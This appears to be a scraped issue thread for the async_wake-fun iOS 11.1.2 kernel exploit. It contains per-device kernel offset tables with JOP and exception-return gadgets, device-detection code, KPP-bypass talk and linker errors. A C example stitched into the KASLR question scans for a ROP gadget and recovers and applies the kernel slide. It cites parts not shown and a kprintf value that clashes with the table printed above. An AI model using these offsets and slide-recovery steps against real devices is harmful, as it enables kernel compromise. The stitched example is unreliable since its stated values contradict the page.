0xFFFFFFF0070B85C0, // KSYMBOL_KFREE
0xFFFFFFF0070B85BC, // KYSMBOL_RET
0xFFFFFFF0074AE718, // KSYMBOL_OSSERIALIZER_SERIALIZE,
0xFFFFFFF007549D40, // KSYMBOL_KPRINTF
0xFFFFFFF0074B96B0, // KSYMBOL_UUID_COPY
0xFFFFFFF00756E000, // KSYMBOL_CPU_DATA_ENTRIES // 0x6000 in to the data segment
0xFFFFFFF00708818C, // KSYMBOL_VALID_LINK_REGISTER // look for reference to FAR_EL1 (Fault Address Register (EL1))
0xFFFFFFF007088164, // KSYMBOL_X21_JOP_GADGET // look for references to FPCR (Floating-point Control Register)
0xFFFFFFF007088434, // KSYMBOL_EXCEPTION_RETURN // look for references to Set PSTATE.DAIF [--IF]
0xFFFFFFF0070883E4, // KSYMBOL_THREAD_EXCEPTION_RETURN // a bit before exception_return
0xFFFFFFF00719CF44, // KSYMBOL_SET_MDSCR_EL1_GADGET // look for references to MDSCR_EL1
0xFFFFFFF0073F6094, // KSYMBOL_WRITE_SYSCALL_ENTRYPOINT // look for references to enosys to find the syscall table (this is actually 1 instruction in to the entrypoint)
0xFFFFFFF007198EC0, // KSYMBOL_EL1_HW_BP_INFINITE_LOOP // look for xrefs to "ESR (0x%x) for instruction trapped" and find switch case 49
0xfffffff0071998BC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};

and here are the symbols I have:
if (strstr(u.machine, "iPod7,1")) {
    printf("this is iPod Touch 6G, should work!\n");
    symbols = ksymbols_ipod_touch_6g_15b202;
    have_syms = 1;
} else if (strstr(u.machine, "iPhone9,3")) {
    printf("this is iPhone 7, should work!\n");
    symbols = ksymbols_iphone_7_15B202;
    have_syms = 1;
} else if (strstr(u.machine, "iPhone9,4")) {
    printf("this is iPhone 7 plus, should work!\n");
    symbols = ksymbols_iphone_7_15B202;
    have_syms = 1;
} else if (strstr(u.machine, "iPhone10,6")) {
    printf("this is iPhone X, should work!\n");
    symbols = ksymbols_iphone_x_15B202;
    have_syms = 1;
} else if (strstr(u.machine, "iPhone8,1")) {
    printf("this is iPhone 6s, should work!\n");
    symbols = ksymbols_iphone_6s_15b202;
    have_syms = 1;
} else if (strstr(u.machine, "iPhone7,1")) {
    printf("this is iPhone 6P, should work!\n");
    symbols = ksymbol_iphone_6p_15b202;
    have_syms = 1;
} else if (strstr(u.machine, "iPhone7,2")) {
    printf("this is iPhone 6, should work!\n");
    symbols = ksymbols_iphone_6_15b202;
    have_syms = 1;
} else if (strstr(u.machine, "iPad4,4")) {
    printf("this is iPad Mini 2 WiFi, should work!\n");
    symbols = ksymbols_ipad_mini_2_wifi_15b202;
    have_syms = 1;
} else if (strstr(u.machine, "iPhone6,2")) {
    printf("this is iPhone 5s, should work!\n");
    symbols = ksymbols_ipad_mini_2_wifi_15b202;
    have_syms = 1;
} else {
    printf("no symbols for this device yet\n");
    printf("tfp0 should still work, but the kernel debugger PoC won't\n");
    symbols = NULL;
    have_syms = 0;
}

I have used some of this code from another async project.

Now kernel panics everytime it's ran

Hi, the current async_wake-fun commit was working fine until about half an hour ago, when I started getting kernel panics every time I ran async_wake-fun. I didn't change any code from the working version at all.

[@ninjaprawn] Question regarding offsets

Seeing that the xnu kernel uses PIC to randomize data and code locations, how are we meant to find and use the offsets (for kernel instructions) in this if they are in a different location every time?
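The two halves of this question are both visible elsewhere on the page: the find_add_x0_x0_0x40_ret patchfinder in the "Crashing issue" scans the static, unslid kernelcache (first the xnucore region, then the prelink region) for the `add x0, x0, #0x40; ret` gadget, and at runtime every constant is used as `unslid + slide`, as in `0xFFFFFFF0074A68C8+slide` in the first issue, with the slide printed in the logs ("slide: 0x0000000018200000", "slide: 0x000000000b400000"). The following added example, written for this page and not taken from async_wake-fun, ties the two together: it scans a constructed text region for the gadget, validating the first word through an ADD-immediate decoder rather than a literal compare, recovers the slide from one leaked runtime address of a symbol with a known unslid value, and rebases the result. The text base 0xFFFFFFF0070C8000, the 0x200000 slide granularity (inferred only from the two slides printed above), the constructed leak and all sim_ names are assumptions; the kprintf value 0xfffffff00758c618 is the iPhone 7 15B202 entry from the table above.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ARM64 encodings the patchfinder on this page matches literally. */
#define INSN_ADD_X0_X0_0x40 0x91010000u   /* add x0, x0, #0x40 */
#define INSN_RET            0xD65F03C0u   /* ret */
#define INSN_NOP            0xD503201Fu   /* nop, filler for the constructed image */

/* Model assumptions: the granularity is inferred only from the two slides printed
 * in this page's logs (0x18200000, 0x0b400000); the text base is made up. */
#define SIM_SLIDE_GRANULE   0x200000ull
#define SIM_TEXT_BASE       0xFFFFFFF0070C8000ull
#define SIM_SLIDE_INVALID   ((uint64_t)-1)

/* Decode ADD (immediate, 64-bit, unshifted): returns imm12 and fills rd/rn, or -1.
 * Top ten bits must be sf=1 op=0 S=0 100010 sh=0, i.e. 0x91000000 under 0xFFC00000. */
int decode_add_imm64(uint32_t insn, unsigned *rd, unsigned *rn) {
    if ((insn & 0xFFC00000u) != 0x91000000u)
        return -1;
    *rd = insn & 0x1Fu;
    *rn = (insn >> 5) & 0x1Fu;
    return (int)((insn >> 10) & 0xFFFu);
}

/* Scan an unslid text region for "add x0, x0, #0x40; ret" and return its unslid
 * address (region_base + offset), or 0. Same search as find_add_x0_x0_0x40_ret
 * above, but a decoy with the wrong register or immediate is rejected by the
 * decoder instead of silently failing a literal compare. */
uint64_t sim_find_add_x0_x0_0x40_ret(const uint8_t *region, size_t size, uint64_t region_base) {
    for (size_t off = 0; off + 8 <= size; off += 4) {
        uint32_t a, b;
        unsigned rd, rn;
        memcpy(&a, region + off, 4);               /* unaligned-safe little-endian read */
        memcpy(&b, region + off + 4, 4);
        if (decode_add_imm64(a, &rd, &rn) == 0x40 && rd == 0 && rn == 0 && b == INSN_RET)
            return region_base + off;
    }
    return 0;
}

/* Recover the slide from one leaked runtime address of a symbol whose unslid
 * address is known (for example an entry of the per-device tables above). */
uint64_t sim_recover_slide(uint64_t leaked, uint64_t unslid) {
    if (leaked < unslid) return SIM_SLIDE_INVALID;
    uint64_t slide = leaked - unslid;
    if (slide % SIM_SLIDE_GRANULE != 0) return SIM_SLIDE_INVALID;  /* not a plausible slide */
    return slide;
}

/* Add the slide to every entry of an unslid symbol table, in place. */
void sim_rebase_symbols(uint64_t *syms, size_t count, uint64_t slide) {
    for (size_t i = 0; i < count; i++) syms[i] += slide;
}

/* Constructed 256-byte text region: NOPs, two decoys and the real gadget at 0xA0. */
uint64_t sim_find_gadget_unslid(void) {
    uint32_t text[64];
    for (size_t i = 0; i < 64; i++) text[i] = INSN_NOP;
    text[10] = INSN_ADD_X0_X0_0x40;               /* decoy: add not followed by ret */
    text[20] = 0x91010001u;                        /* decoy: add x1, x0, #0x40 ; ret (rd != 0) */
    text[21] = INSN_RET;
    text[40] = INSN_ADD_X0_X0_0x40;               /* the gadget: offset 40 * 4 = 0xA0 */
    text[41] = INSN_RET;
    return sim_find_add_x0_x0_0x40_ret((const uint8_t *)text, sizeof text, SIM_TEXT_BASE);
}

/* Runtime step: a constructed leak of kprintf at unslid + 0x18200000 (the iPhone 7
 * 15B202 KSYMBOL_KPRINTF value plus the slide printed in the iPhone SE log) yields
 * the slide, which is then applied to the gadget's unslid address. */
uint64_t sim_runtime_gadget_address(void) {
    const uint64_t kprintf_unslid = 0xFFFFFFF00758C618ull;
    const uint64_t kprintf_leaked = kprintf_unslid + 0x18200000ull;  /* constructed leak */
    uint64_t slide = sim_recover_slide(kprintf_leaked, kprintf_unslid);
    if (slide == SIM_SLIDE_INVALID) return 0;
    uint64_t syms[1] = { sim_find_gadget_unslid() };
    sim_rebase_symbols(syms, 1, slide);
    return syms[0];
}

int main(void) {
    printf("gadget (unslid):  0x%016llx\n", (unsigned long long)sim_find_gadget_unslid());
    printf("gadget (runtime): 0x%016llx\n", (unsigned long long)sim_runtime_gadget_address());
    return 0;
}
```

Two practical checks fall out of this. The slide is a single number for the whole kernelcache, so once it is recovered from any one symbol it applies to every entry of a per-device table; and a table built for the wrong build or device (the "iPhone6,2" branch above reuses the iPad mini 2 table, for instance) still rebases cleanly but points at whatever happens to sit at those addresses, which is one way to get the resprings and panics described in this thread.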

qwertyoruiop's kpp bypass

Luca said that his KPP bypass from yalu102 still works in iOS 11.1.2 with a few changes. Have you tried it?

Undefined symbols for architecture arm64

  "_file_exist", referenced from:
      _let_the_fun_begin in fun.o
  "_get_code_directory", referenced from:
      _let_the_fun_begin in fun.o
  "_get_sha256", referenced from:
      _let_the_fun_begin in fun.o
  "_kalloc", referenced from:
      _let_the_fun_begin in fun.o
     (maybe you meant: _early_kalloc, _message_size_for_kalloc_size , _send_kalloc_message )
  "_kwrite", referenced from:
      _let_the_fun_begin in fun.o
  "_kwrite32", referenced from:
      _let_the_fun_begin in fun.o
  "_init_kernel_utils", referenced from:
      _let_the_fun_begin in fun.o
  "_kread32", referenced from:
      _let_the_fun_begin in fun.o
  "_kread", referenced from:
      _let_the_fun_begin in fun.o
      _init_kernel in patchfinder64.o
  "_kread64", referenced from:
      _kexecute in fun.o
      _let_the_fun_begin in fun.o
  "_cp", referenced from:
      _let_the_fun_begin in fun.o
  "_kwrite64", referenced from:
      _kexecute in fun.o
      _let_the_fun_begin in fun.o
Symbol(s) not found for architecture arm64
